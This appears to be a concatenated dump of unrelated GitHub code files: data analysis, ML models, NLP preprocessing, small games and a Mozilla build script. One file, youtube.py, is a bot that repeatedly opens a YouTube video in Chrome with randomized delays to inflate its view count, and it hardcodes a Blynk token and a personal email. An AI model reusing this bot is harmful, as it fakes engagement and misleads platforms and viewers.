    =2:\n axes[0][6-indx].boxplot(diabetes_unaltered[col], flierprops=outliers)\n axes[0][6-indx].set_ylabel(col)\n elif indx <=10 and indx>=6:\n axes[1][10-indx].boxplot(diabetes_unaltered[col], flierprops=outliers)\n axes[1][10-indx].set_ylabel(col)\nfig.suptitle(\"Boxplots for Diabetes Features\")\nfig.tight_layout()\nfig.subplots_adjust(top=0.88)\nplt.savefig(f'plots/Boxplots_features')\nplt.clf()\n\n#Scatter Plot\nfig, axes = plt.subplots(1, 1, figsize=(5, 5))\naxes.grid(axis='y', alpha=0.5)\naxes.scatter(diabetes_df[\"tch\"], diabetes_df[\"Target\"], marker=\"1\", color='blue')\naxes.scatter(diabetes_df[\"BP\"], diabetes_df[\"Target\"], marker=\"*\", color='orange')\naxes.scatter(diabetes_df[\"BMI\"], diabetes_df[\"Target\"], marker=\".\", color='green')\naxes.set_title(f'Diabetes comparisons')\naxes.set_ylabel('Diabetes Progression Indicator')\naxes.set_xlabel('Feature Levels')\naxes.legend((\"tch\", \"BP\", \"BMI\"))\nplt.savefig(f'plots/diabetesProgression_to_tch_BP_BMI.png', dpi=300)\nplt.clf()\nplt.close()\n\n#Lasso Regression analysis\n\n#Dummy variable for sex feature\nencoded_sex = pd.get_dummies(diabetes_df['Sex'], drop_first=True)\ndiabetes_df = pd.concat([diabetes_df, encoded_sex], axis=1)\ndiabetes_df.rename(columns = {list(diabetes_df)[11]: \"Encoded Sex\"}, inplace=True)\ndiabetes_df.drop(['Sex'], axis=1, inplace=True)\n\n#Removing outliers based on Z Score\nz = np.abs(stats.zscore(diabetes_df))\ndiabetes_df_o = diabetes_df[(z < 3).all(axis=1)]\nX = diabetes_df_o.loc[:, ['Age', 'BMI', 'BP', 'map', 'tc', 'ldl', 'hdl', 'tch', 'glu', 'Encoded Sex']]\ny = diabetes_df_o['Target']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\nlasso = Lasso()\nlasso.fit(X_train, y_train)\n\nprint(f\"Intercept: {lasso.intercept_}\\n\")\nprint(f\"Coeficients: {lasso.coef_}\\n\")\nprint(f\"Named Coeficients: {pd.DataFrame(lasso.coef_, X.columns)}\")\npd.DataFrame(lasso.coef_, X.columns).to_csv(\"Lasso Coefficients\")\n\npredicted_values = lasso.predict(X_test)\n\nfor (real, predicted) in list(zip(y_test, predicted_values)):\n print(f\"Value: {real:.2f}, pred: {predicted:.2f}, diff: {(real - predicted):.2f}\")\n\nsns.set(palette=\"hls\")\nresiduals = y_test - predicted_values\n\nsns.scatterplot(y_test, predicted_values, marker=\"+\")\nplt.plot([0, 300], [0, 300], '--')\nplt.xlabel('Real Value')\nplt.ylabel('Predicted Value')\nplt.title('Lasso Real Value vs Predicted Values')\nplt.savefig('plots/Lasso_Predicted.png')\nplt.clf()\n\nsns.scatterplot(y_test, residuals, marker=\"s\")\nplt.plot([200, 0], [0, 0], '--')\nplt.xlabel('Real Value')\nplt.ylabel('Residuals')\nplt.title('Lasso Real Value vs Residuals')\nplt.savefig('plots/Lasso_Residuals.png')\nplt.clf()\n\nsns.distplot(residuals, bins=20, kde=False)\nplt.plot([0, 0], [50, 0], '--')\nplt.title('Lasso Residual Distribution')\nplt.savefig('plots/Lasso_Residual_Distn.png')\nplt.clf()\nplt.close()\n\nprint(f\"MAE error(avg abs residual): {metrics.mean_absolute_error(y_test, predicted_values)}\")\nprint(f\"MSE error: {metrics.mean_squared_error(y_test, predicted_values)}\")\nprint(f\"RMSE error: {np.sqrt(metrics.mean_squared_error(y_test, predicted_values))}\")","repo_name":"MarisaAlves/Project_Diabetes","sub_path":"Python_Scripts/Lasso_Regression.py","file_name":"Lasso_Regression.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12160638878","text":"import torch\nimport torch.nn as nn\nfrom transformers.models.bert.modeling_bert import BertConfig, BertEncoder, BertModel\n\nfrom .model_base.model_embed_base import EmbedLayer\nfrom .model_base.model_mlp import MultiLayerPerceptron\n\n\nclass BidirectionalEncoderRepresentationsfromTransformers(nn.Module):\n \"\"\"\n BERT model\n \"\"\"\n\n def __init__(self, settings):\n \"\"\"\n Initializes BERT Model\n\n Parameters:\n settings(dict): Dictionary containing the settings\n \"\"\"\n\n super().__init__()\n\n # Get settings\n self.embedding_dim = settings[\"bert\"][\"embedding_dim\"]\n self.input_dim = settings[\"bert\"][\"input_dim\"]\n self.label_len_dict = settings[\"label_len_dict\"]\n self.n_layers = settings[\"bert\"][\"n_layers\"]\n self.n_heads = settings[\"bert\"][\"n_heads\"]\n self.dense_layer_dim = settings[\"bert\"][\"dense_layer_dim\"]\n self.non_embed_col = settings[\"non_embedding_columns\"]\n\n # Create embedding layer\n self.embed_layer = EmbedLayer(self.embedding_dim, self.label_len_dict)\n\n # Create input linear layer\n embed_output_dim = self.embed_layer.get_output_dim()\n self.input_lin = nn.Linear(\n embed_output_dim + len(self.non_embed_col), self.input_dim\n )\n\n # Create BERT layer\n self.config = BertConfig(\n 3, # not used\n hidden_size=self.input_dim,\n num_hidden_layers=self.n_layers,\n num_attention_heads=self.n_heads,\n max_position_embeddings=settings[\"bert\"][\"max_seq_len\"],\n )\n\n self.encoder = BertModel(self.config)\n\n # output dense layer\n self.output_lin = MultiLayerPerceptron(self.input_dim, self.dense_layer_dim)\n\n return\n\n def forward(self, x):\n # Get data input size\n input_size = len(x[\"interaction\"])\n\n # Embedding layer\n embedded_x = self.embed_layer(x)\n\n # Combine non-embedding layer\n if len(self.non_embed_col) != 0:\n embedded_x = torch.cat(\n [embedded_x] + [x[i].unsqueeze(2) for i in self.non_embed_col], -1\n )\n\n # Input linear layer\n input_x = self.input_lin(embedded_x)\n\n # BERT layer\n encoded_layers = self.encoder(inputs_embeds=input_x, attention_mask=x[\"mask\"])\n out = encoded_layers[0]\n\n # Dense layer\n out = out.contiguous().view(input_size, -1, self.input_dim)\n out = self.output_lin(out).view(input_size, -1)\n\n return out\n","repo_name":"boostcampaitech5/level2_dkt-recsys-06","sub_path":"code/src/model_folder/model_bert.py","file_name":"model_bert.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18407870815","text":"#!/usr/bin/python3\n\"\"\"Defines a class Square that inherits from class Rectangle\"\"\"\nRectangle = __import__('9-rectangle').Rectangle\n\n\nclass Square(Rectangle):\n \"\"\"Description for the class Square\"\"\"\n\n def __init__(self, size):\n \"\"\"Initializes instances of the class\"\"\"\n\n super().integer_validator('size', size)\n super().__init__(size, size)\n self.__size = size\n","repo_name":"Beldine-Moturi/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/11-square.py","file_name":"11-square.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9085939292","text":"import streamlit as st\nfrom PIL import Image, ImageDraw\nimport time\nimport os\nimport requests\nfrom google.cloud import vision\nfrom google.cloud.vision_v1 import types\nfrom google.oauth2 import service_account\nimport json\nimport uuid\nimport io\n\n# import audio\nimport threading\nfrom multiprocessing import Queue\n\nmaikadomain = os.getenv(\"MAIKA_DOMAIN\")\n\n\ncredentials = service_account.Credentials.from_service_account_info(\n dict(st.secrets[\"connection\"][\"gcs\"]), scopes=[\"https://www.googleapis.com/auth/cloud-platform\"]\n)\n\n# def detect_document_text_with_confidence(full_text_annotation, min_confidence=0.9):\n\n# filtered_text_blocks = []\n# for page in full_text_annotation.pages:\n# for block in page.blocks:\n# for paragraph in block.paragraphs:\n# for word in paragraph.words:\n# text = ''.join([symbol.text for symbol in word.symbols])\n# confidence = word.confidence\n# if confidence > min_confidence:\n# filtered_text_blocks.append((text, confidence))\n\n# return filtered_text_blocks\n\n@st.cache_data\ndef get_file_content(image_url):\n response = requests.get(image_url)\n file_content = response.content\n return file_content\n\ndef detect_document_text_with_confidence(full_text_annotation, min_block_conf = 0.0, min_paragraph_conf=0.9, min_word_conf=0.0):\n result=''\n\n for page in full_text_annotation.pages:\n # print(42, page.confidence)\n block_texts = []\n for block in page.blocks:\n if float(block.confidence) < min_block_conf:\n continue\n paragraph_texts = []\n for paragraph in block.paragraphs:\n if float(paragraph.confidence) < min_paragraph_conf: continue\n\n words = []\n # print(48, paragraph.confidence)\n for word in paragraph.words:\n if float(word.confidence) 9:\n raise ValueError(\"User input out of range.\")\n elif board_array[user_input - 1] != Piece.E:\n print(\"Error: This space is not available.\")\n continue\n else:\n position = user_input\n except ValueError:\n print(\"Error: Invalid input.\")\n continue\n\n # Adjust for 0-based index.\n return position - 1\n\ndef user_turn(board_array):\n position = user_choice_prompt(board_array)\n board_array[position] = Piece.X\n\ndef computer_turn(board_array):\n position = random_empty_space_index(board_array)\n board_array[position] = Piece.O\n\ndef get_board_type():\n default = BoardType.NUMBERED\n\n if len(sys.argv) == 2:\n if sys.argv[1] == BoardType.SIMPLE.value:\n return BoardType.SIMPLE\n elif sys.argv[1] == BoardType.NUMBERED.value:\n return BoardType.NUMBERED\n else:\n return default\n else:\n return default\n\n# Main\n\ndef main():\n board_type = get_board_type()\n play_game = True\n while play_game:\n board_array = create_board_array()\n game_is_over = False\n\n print_board(board_type, board_array)\n\n while not game_is_over:\n user_turn(board_array)\n game_is_over = check_for_winner(board_array) or check_for_tie(board_array)\n\n if not game_is_over:\n computer_turn(board_array)\n game_is_over = check_for_winner(board_array) or check_for_tie(board_array)\n\n print_board(board_type, board_array)\n\n if game_is_over:\n check_for_winner(board_array, print_results=True) or check_for_tie(board_array, print_results=True)\n\n print()\n play_again_user_input = input(\"Play again? (Y/n) \")\n if play_again_user_input != \"\" and play_again_user_input != \"Y\" and play_again_user_input != \"y\":\n play_game = False\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print()\n print(\"Bye-bye!\")\n quit()","repo_name":"rlziii/Python-Tic-Tac-Toe","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40755250111","text":"#!/usr/bin/env python\n\nimport argparse\nimport codecs\nimport configparser\nimport datetime\nimport json\nimport os\nimport shutil\nimport zipfile\n\n\nLEGACY_DISTROS = {\n \"baidu\": \"firefox.baidusd\",\n \"baizhu\": \"firefox.dw\",\n \"cumulon\": \"firefox.newhua\",\n \"kingsoft\": \"firefox.kis\",\n \"mainOther\": \"firefox.com.cn\",\n \"mainWinFull\": \"full.firefox.com.cn\",\n \"mainWinStub\": \"stub.firefox.com.cn\",\n \"mainWinStubFallback\": \"firefox.latest\",\n \"mydown\": \"firefox.yesky\",\n \"others\": \"firefox.others\",\n \"qihoo\": \"firefox.3gj\",\n \"tencent\": \"firefox.qm\",\n \"xbsafe\": \"firefox.xbsafe2\",\n \"zol\": \"firefox.zol\"\n}\n\n\ndef update_dist_extension(distro, extensions):\n for ext_id in extensions:\n filename = \"{}.xpi\".format(ext_id)\n\n ext_path = os.path.join(\"..\", distro, \"distribution\",\n \"extensions\", filename)\n if os.path.exists(ext_path):\n print(\"Updating {}\".format(ext_path))\n shutil.copy2(extensions[ext_id], ext_path)\n continue\n\n opt_ext_path = os.path.join(\"..\", distro, \"distribution\",\n \"optional-extensions\", filename)\n if os.path.exists(opt_ext_path):\n print(\"Updating {}\".format(opt_ext_path))\n shutil.copy2(extensions[ext_id], opt_ext_path)\n\n\ndef update_dist_ini(distro, version):\n legacy_distro = LEGACY_DISTROS.get(distro, \"firefox.com.cn\")\n\n cfg = configparser.ConfigParser()\n cfg.optionxform = str\n cfg.read([\n os.path.join(\"templates\", \"distribution.ini\"),\n os.path.join(\"..\", distro, \"dist_addition.ini\")\n ], \"utf-8\")\n\n cfg[\"Global\"][\"version\"] = version\n cfg[\"Preferences\"][\"app.distributor.channel\"] = json.dumps(distro)\n cfg[\"Preferences\"][\"app.partner.{}\".format(distro)] = json.dumps(distro)\n cfg[\"Preferences\"][\"app.chinaedition.channel\"] = json.dumps(legacy_distro)\n\n dist_ini_path = os.path.join(\"..\", distro,\n \"distribution\", \"distribution.ini\")\n print(\"Updating {}\".format(dist_ini_path))\n with codecs.open(dist_ini_path, \"wb\", \"utf-8\") as dist_ini:\n cfg.write(dist_ini, space_around_delimiters=False)\n\n\ndef update_extension(args):\n extensions = {}\n\n if args.ext:\n exts = args.ext\n else:\n ext_dir = os.path.join(\"templates\", \"extensions\")\n exts = [os.path.join(ext_dir, ext_name)\n for ext_name in os.listdir(ext_dir)\n if ext_name.endswith(\".xpi\")]\n\n for ext in exts:\n with zipfile.ZipFile(ext) as ext_file:\n try:\n manifest_file = ext_file.open(\"manifest.json\")\n except KeyError:\n manifest_file = ext_file.open(\"webextension/manifest.json\")\n manifest = json.loads(manifest_file.read().decode(\"utf-8\"))\n manifest_file.close()\n\n ext_id = manifest.get(\"applications\", {}).get(\"gecko\", {}).get(\"id\")\n if not ext_id:\n print(\"id not found for extension: {}\".format(ext))\n continue\n\n extensions[ext_id] = ext\n\n for distro in os.listdir(\"..\"):\n if not os.path.exists(os.path.join(\"..\", distro, \"repack.cfg\")):\n continue\n\n update_dist_extension(distro, extensions)\n\n\n\ndef update_ini(args):\n for distro in os.listdir(\"..\"):\n if not os.path.exists(os.path.join(\"..\", distro, \"repack.cfg\")):\n continue\n\n update_dist_ini(distro, \"{}.{}\".format(args.year, args.month))\n\n\ndef main():\n today = datetime.date.today()\n\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(\n description='subcommands to update parts of the each distribution',\n help='run each subcommand to see more details')\n\n ini_parser = subparsers.add_parser('ini')\n ini_parser.add_argument(\"-y\", \"--year\", default=today.year, type=int,\n help=\"set year part of distribution version\", metavar=\"YYYY\")\n ini_parser.add_argument(\"-m\", \"--month\", default=today.month, type=int,\n help=\"set month part of distribution version\", metavar=\"MM\")\n ini_parser.set_defaults(func=update_ini)\n\n ext_parser = subparsers.add_parser('extension')\n ext_parser.add_argument(\"-e\", \"--ext\", nargs='+',\n help=\"the extension file(s) to copy into each distribution\",\n metavar=\"ext.xpi\")\n ext_parser.set_defaults(func=update_extension)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mozilla-partners/mozillaonline","sub_path":"desktop/scripts/update-dist.py","file_name":"update-dist.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"74016025490","text":"# number of words, chars, word freq., sentence freq. audio len\n\nimport sys\nimport re\n\npattern = re.compile('[\\W_]+', re.UNICODE)\n\ntext_path = sys.argv[1] #/home/danni/workspace/data/cv/clean_validated/text'\n#'/home/danni/workspace/data/how2/data/orig/how2-300h-v1/data/train/text.id.en'\n\nword_dict = dict()\nsent_dict = dict()\n\nwith open(text_path, 'r') as f:\n for line in f.readlines():\n words = [pattern.sub('', i.strip()) for i in line.strip().lower().split(' ')[1:]]\n for word in words:\n if word not in word_dict:\n word_dict[word] = 1\n else:\n word_dict[word] += 1\n sent = ' '.join(words)\n if sent not in sent_dict:\n sent_dict[sent] = 1\n else:\n sent_dict[sent] += 1\n\nprint('Vocab size:', len(word_dict))\nprint('Vocab count:')\nfor tup in sorted(word_dict.items(), key=lambda kv: kv[1], reverse=True)[:100]:\n print(tup)\n\nprint('Sent size:', len(sent_dict))\nprint('Sent count:')\nfor tup in sorted(sent_dict.items(), key=lambda kv: kv[1], reverse=True)[:100]:\n print(tup)\n","repo_name":"dannigt/NMTGMinor.lowLatency","sub_path":"smalltools/corpus_stats.py","file_name":"corpus_stats.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"40033945579","text":"'''\n\n explore.py\n\n Description: This file contains functions used for producing visualizations\n and conducting statistical tests in the final report notebook.\n\n Variables:\n\n None\n\n Functions:\n\n plot_target_distribution(df)\n plot_most_frequent_words(df)\n plot_contains_keywords(df)\n plot_bigrams(df)\n plot_readme_size_vs_language(df, group_column = 'language')\n one_sample_ttest(df, sample, column, alternative = 'two-sided')\n\n'''\n\n################################################################################\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\n\nimport nltk\n\nfrom wordcloud import WordCloud\n\n################################################################################\n\ndef plot_target_distribution(df: pd.DataFrame) -> None:\n '''\n Create a plot of the distribution of the target variable \"language\".\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n plt.figure(figsize = (14, 4))\n sns.histplot(data = df, x = 'language')\n\n plt.title('The main programming language for most repositories is not in the top 3 (Python, C++, JavaScript)')\n plt.xlabel('Programming Language')\n \n plt.show()\n\n################################################################################\n\ndef plot_most_frequent_words(df: pd.DataFrame) -> None:\n '''\n Create plots displaying the most frequent words for each programming \n language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing natural language data. The data should \n ideally be prepared.\n '''\n\n # Show the top 5 most frequent words.\n n = 5\n fig, ax = plt.subplots(ncols = 1, nrows = 3, figsize = (14, 8))\n\n # Get the top 20 most frequent words across all repos.\n clean_words = ' '.join(readme for readme in df.clean)\n clean_words_freq = pd.Series(clean_words.split()).value_counts().head(20)\n\n # Combine all words for each programming language into single strings.\n python_words = ' '.join(text for text in df[df.language == 'Python'].clean)\n cpp_words = ' '.join(text for text in df[df.language == 'C++'].clean)\n javascript_words = ' '.join(text for text in df[df.language == 'JavaScript'].clean).replace(' ', '')\n\n # Remove the top 20 most frequent words across all repos for each group.\n python_words = ' '.join(word for word in python_words.split() if word not in clean_words_freq)\n cpp_words = ' '.join(word for word in cpp_words.split() if word not in clean_words_freq)\n javascript_words = ' '.join(word for word in javascript_words.split() if word not in clean_words_freq)\n\n # Create plots for the most frequent words for each programming language\n\n python_words_freq = pd.Series(python_words.split())\n python_words_freq.value_counts().head(n).plot.barh(ax = ax[0])\n ax[0].set_title('Most Frequent Words in Python Repository READMEs')\n ax[0].set_xlabel('Word Count')\n ax[0].set_ylabel('Words')\n\n cpp_words_freq = pd.Series(cpp_words.split())\n cpp_words_freq.value_counts().head(n).plot.barh(ax = ax[1])\n ax[1].set_title('Most Frequent Words in C++ Repository READMEs')\n ax[1].set_xlabel('Word Count')\n ax[1].set_ylabel('Words')\n\n javascript_words_freq = pd.Series(javascript_words.split())\n javascript_words_freq.value_counts().head(n).plot.barh(ax = ax[2])\n ax[2].set_title('Most Frequent Words in JavaScript Repository READMEs')\n ax[2].set_xlabel('Word Count')\n ax[2].set_ylabel('Words')\n\n plt.tight_layout()\n\n plt.show()\n\n################################################################################\n\ndef plot_contains_keywords(df: pd.DataFrame) -> None:\n '''\n Plot a distribution of the contains_keywords features for each \n programming language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n fig, ax = plt.subplots(ncols = 3, nrows = 1, figsize = (14, 4))\n\n sns.histplot(data = df[df.language == 'Python'], x = 'contains_python_keywords', ax = ax[0])\n ax[0].set_title('Python Repositories')\n ax[0].set_xlabel('Contains Python Keywords')\n\n sns.histplot(data = df[df.language == 'C++'], x = 'contains_cpp_keywords', ax = ax[1])\n ax[1].set_title('C++ Repositories')\n ax[1].set_xlabel('Contains C++ Keywords')\n\n sns.histplot(data = df[df.language == 'JavaScript'], x = 'contains_js_keywords', ax = ax[2])\n ax[2].set_title('JavaScript Repositories')\n ax[2].set_xlabel('Contains JavaScript Keywords')\n\n plt.show()\n\n################################################################################\n\ndef plot_bigrams(df: pd.DataFrame) -> None:\n '''\n Create plots displaying the most common bi-grams for each programming \n language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n fig, ax = plt.subplots(ncols = 1, nrows = 3, figsize = (14, 8))\n\n python_clean_words = ' '.join(readme for readme in df[df.language == 'Python'].clean)\n cpp_clean_words = ' '.join(readme for readme in df[df.language == 'C++'].clean)\n javascript_clean_words = ' '.join(readme for readme in df[df.language == 'JavaScript'].clean).replace(' ', '')\n\n python_bigrams = pd.Series(nltk.bigrams(python_clean_words.split()))\n python_bigrams.value_counts().head(5).plot.barh(ax = ax[0])\n ax[0].set_title('Most common bi-grams for Python repositories')\n ax[0].set_xlabel('Count')\n ax[0].set_ylabel('Bi-Gram')\n\n cpp_bigrams = pd.Series(nltk.bigrams(cpp_clean_words.split()))\n cpp_bigrams.value_counts().head(5).plot.barh(ax = ax[1])\n ax[1].set_title('Most common bi-grams for C++ repositories')\n ax[1].set_xlabel('Count')\n ax[1].set_ylabel('Bi-Gram')\n\n javascript_bigrams = pd.Series(nltk.bigrams(javascript_clean_words.split()))\n javascript_bigrams.value_counts().head(5).plot.barh(ax = ax[2])\n ax[2].set_title('Most common bi-grams for JavaScript repositories')\n ax[2].set_xlabel('Count')\n ax[2].set_ylabel('Bi-Gram')\n\n plt.tight_layout()\n\n plt.show()\n\n################################################################################\n\ndef plot_readme_size_vs_language(df: pd.DataFrame, group_column: str = 'language') -> None:\n '''\n Create a plot that shows the average readme size grouping by the \n group_column parameter. By default this will show the average readme \n size for each programming language in the target variable.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n\n group_column: str, optional\n The column to group the data by.\n '''\n\n plt.figure(figsize = (14, 4))\n\n df.groupby(group_column).readme_size.mean().plot.barh()\n plt.title('Average README file size by programming language')\n\n plt.xlabel('Average Character Count')\n plt.ylabel('Programming Language')\n\n plt.show()\n\n################################################################################\n\ndef one_sample_ttest(df: pd.DataFrame, sample: pd.DataFrame, column: str, alternative: str = 'two-sided') -> None:\n '''\n Conduct a one sample t-test using the provided dataframe and sample \n dataframe. The hypothesis is tested on the column parameter. By \n default a two sided t-test is conducted.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the full population of the data.\n\n sample: DataFrame\n A pandas dataframe containing the sample that is being tested.\n\n column: str\n The feature in the data that will be tested.\n\n alternative: str, optional\n The type of t-test to perform. The default is a two-sided t-test.\n '''\n\n alpha = 0.05\n\n t, p = stats.ttest_1samp(sample[column], df[column].mean(), alternative = alternative)\n\n if p < alpha:\n print('Fail to reject H0')\n else:\n print('Reject H0')","repo_name":"Garcia-Hensley-Nichols-NLP-project/GHN-NLP-project","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":8230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8614083840","text":"# Built from code from: https://www.pluralsight.com/guides/building-a-twitter-sentiment-analysis-in-python\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport string\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import wordpunct_tokenize\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom nltk.stem import PorterStemmer\r\nfrom nltk.stem import LancasterStemmer\r\nfrom nltk.stem.util import prefix_replace\r\nfrom nltk.stem.util import suffix_replace\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport nltk\r\n# run first time\r\n# nltk.download('stopwords')\r\n# nltk.download('punkt')\r\n# nltk.download('wordnet')\r\n# nltk.download('omw-1.4')\r\n\r\n# Read in file\r\ndf = pd.read_excel(\"Sample Tweets.xlsx\", sheet_name = 'Ratings').drop(columns = ['Unnamed: 0'])\r\n\r\n# count CAPITAL words, excluding I and A - does include positions and acronyms though\r\ndf['capitals'] = [len(re.findall(r'\\b[A-Z]+\\b(?\\?@\\[\\\\\\]\\^_`{\\|}~]\",' ', new_tweet)\r\n \r\n # Replace abreviations that require numbers\r\n new_tweet = new_tweet.replace(' s ', ' safety ') # as in S and not 80s, 90s, etc.\r\n new_tweet = new_tweet.replace(' b4 ', ' before ')\r\n \r\n # Remove all numbers\r\n new_tweet = re.sub(r'\\d', '', new_tweet)\r\n \r\n # Replace abreviations with punctuation and numbers gone\r\n for old, new in abr_dict.items():\r\n new_tweet = new_tweet.replace(old, new)\r\n\r\n tweet_tokens = wordpunct_tokenize(new_tweet) # separates words and punctuation and spellchecks (sometimes)\r\n \r\n # Remove emojis and weird (non-english alphabet) characters\r\n demoji = [w.encode('ascii', 'ignore').decode('ascii') for w in tweet_tokens]\r\n # Remove stop words\r\n filtered_words = [w for w in demoji if not w in stop_words]\r\n\r\n # stemm\r\n ps = PorterStemmer() # removes suffixes - makes it look very strange and unreadable, including proper nouns\r\n # ls = LancasterStemmer() # more aggressive suffix removal\r\n stemmed_words = [ps.stem(w) for w in filtered_words]\r\n # stemmed_words = [ls.stem(w) for w in filtered_words]\r\n \r\n # lemmatize\r\n lemmatizer = WordNetLemmatizer()\r\n lemma_words = [lemmatizer.lemmatize(w, pos='v') for w in stemmed_words] # changes verbs to same tense\r\n \r\n # Remove single letters left (d and c from d.c., s from 80s, etc.)\r\n final_words = [w for w in lemma_words if len(w) > 1]\r\n # join words again\r\n final_tweet = \" \".join(final_words)\r\n # Remove extra whitespace\r\n # final_tweet = \" \".join(final_tweet.split())\r\n\r\n \r\n return final_tweet\r\n\r\n# Preprocess data\r\ndf.text = df['text'].apply(preprocess_tweet_text)\r\n\r\ndf.rename(columns = {'Sentiment Rating' : 'sentiment'}, inplace = True)\r\ndf.to_csv(\"preprocessed_tweets.csv\")\r\n","repo_name":"sarah2wise/nfl_twitter_prediction","sub_path":"Preprocessing_Text.py","file_name":"Preprocessing_Text.py","file_ext":"py","file_size_in_byte":9672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24491746906","text":"import concurrent.futures\r\nimport BlynkLib\r\nimport sys\r\nimport time \r\nimport requests\r\nimport random\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\nif sys.version_info[0] > 2:\r\n\tfrom http.cookiejar import LWPCookieJar\r\n\tfrom urllib.request import Request, urlopen\r\n\tfrom urllib.parse import quote_plus, urlparse, parse_qs\r\nelse:\r\n\tfrom cookielib import LWPCookieJar\r\n\tfrom urllib import quote_plus\r\n\tfrom urllib2 import Request, urlopen\r\n\tfrom urlparse import urlparse, parse_qs\r\n\r\n\r\n_URL = 'https://www.youtube.com/watch?v=NrzLnl3tH0U?autoplay=1'\r\n_MAIL = 'thuykieulk1999@gmail.com'\r\n_VIEW = 0\r\n\r\nblynk = BlynkLib.Blynk(token = 'e80ff069a180413cb357e059bb0a1568' , server = 'blynk.getblocky.com')\r\nimport _thread\r\n_thread.start_new_thread(blynk.run,())\r\n\r\nwhile blynk.state != BlynkLib.AUTHENTICATED:\r\n pass\r\n\r\ndef _viewCount():\r\n html = requests.get(_URL).text.split('\\n')\r\n for x in html :\r\n if 'watch-view-count' in x :\r\n viewCount = int(x[116:].split(' ')[0])\r\n return viewCount\r\n return None\r\n\r\ndef _viewCheckRoutine():\r\n while True :\r\n time.sleep(10)\r\n currentCount = _viewCount()\r\n if currentCount != _VIEW :\r\n currentCount = _VIEW\r\n blynk.email(_MAIL , \"Youtube View\" , \"View : {}\".format(_viewCount()))\r\n_thread.start_new_thread(_viewCheckRoutine,())\r\n\r\ndef randomDelay():\r\n delayTime = random.randrange(20 , 50)\r\n time.sleep(delayTime)\r\n\r\n\r\ndef chromeThread (a=0):\r\n for i in range(5):\r\n if i <5:\r\n randomDelay()\r\n web = webdriver.Chrome()\r\n web.get(_URL)\r\n time.sleep(120)\r\n randomDelay()\r\n web.quit()\r\n else:\r\n break\r\n\r\n\r\n\r\n\r\n\r\nwith concurrent.futures.ThreadPoolExecutor (max_workers=4) as ex :\r\n threads = {ex.submit(chromeThread,0) : 0 for i in range(1)}\r\n for future in concurrent.futures.as_completed(threads):\r\n url = threads[future]\r\n try :\r\n data = future.result()\r\n except Exception as err:\r\n print(err)\r\n","repo_name":"ltdpttk/pass","sub_path":"youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73278266130","text":"import itertools\r\n\r\ndef dev_options_form_parts(patrs_number):\r\n option = [1,0]\r\n option_list = []\r\n n=0\r\n while n < patrs_number:\r\n for rec in option:\r\n print(rec)\r\n \r\n option_list.append(option + 0)\r\n #option_list.append(option + 1)\r\n n = n+1\r\n return option_list\r\n# i läuft von 1 bis n\r\n#soll eine [0,1] generieren\r\n#diese verduppeln\r\n#jedes element aus [[0,1,0,0,i],[2i]] mit nx1 und 2nx0 erweitern\r\n\r\ndef gen_all_possible_job_sequences(jobs_data):\r\n jobs =[]\r\n for operation, job_list in jobs_data.items():\r\n for job in job_list:\r\n jobs.append(job)\r\n\r\n job_possibilities =itertools.permutations(jobs)\r\n return\r\n","repo_name":"wasilina83/opt_jobshop","sub_path":"optionsgenerator.py","file_name":"optionsgenerator.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36571544221","text":"import os\nimport art\n\nart\n\nno_more_bidders = False\n\nbids = {}\n\ndef find_highest_bidder(bids):\n\n highest_bid = 0\n winner = \"\"\n\n for bidder in bids:\n bid_amount = bids[bidder]\n if bid_amount > highest_bid:\n highest_bid = bid_amount\n winner = bidder\n os.system('cls')\n print(f\"The winner is {winner} with a bid of £{highest_bid}\")\n\nwhile not no_more_bidders:\n\n name = input(\"Please enter your name: \")\n bid = int(input(\"Please enter your bid: \"))\n\n bids[name] = bid\n\n if input(\"Are there any more bidders? Yes / No : \").lower() == \"no\":\n no_more_bidders = True\n find_highest_bidder(bids)\n\n 